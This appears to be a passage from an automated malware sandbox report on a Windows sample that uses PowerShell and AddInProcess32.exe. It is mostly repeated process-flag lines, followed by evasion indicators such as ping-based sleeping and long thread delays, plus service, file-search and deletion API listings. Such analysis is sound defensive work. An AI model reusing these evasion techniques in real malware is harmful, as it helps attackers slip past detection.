Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 11_2_0040E18D Sleep,ExitProcess,

11_2_0040E18D

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

11_2_004186FE

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3402	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1665	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1084	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3818	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 7986	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 1499	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: foregroundWindowGot 1770	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

API coverage: 9.9 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912	Thread sleep count: 3402 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912	Thread sleep count: 1665 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7936	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8064	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8132	Thread sleep count: 3818 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8132	Thread sleep count: 6000 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184	Thread sleep time: -20291418481080494s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1704	Thread sleep count: 213 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1704	Thread sleep time: -106500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1172	Thread sleep count: 7986 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1172	Thread sleep time: -23958000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1172	Thread sleep count: 1499 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1172	Thread sleep time: -4497000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	11_2_0041A01B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	11_2_0040B28E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_0040838E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_004087A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	11_2_00407848
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_004068CD FindFirstFileW,FindNextFileW,	11_2_004068CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0044BA59 FindFirstFileExA,	11_2_0044BA59
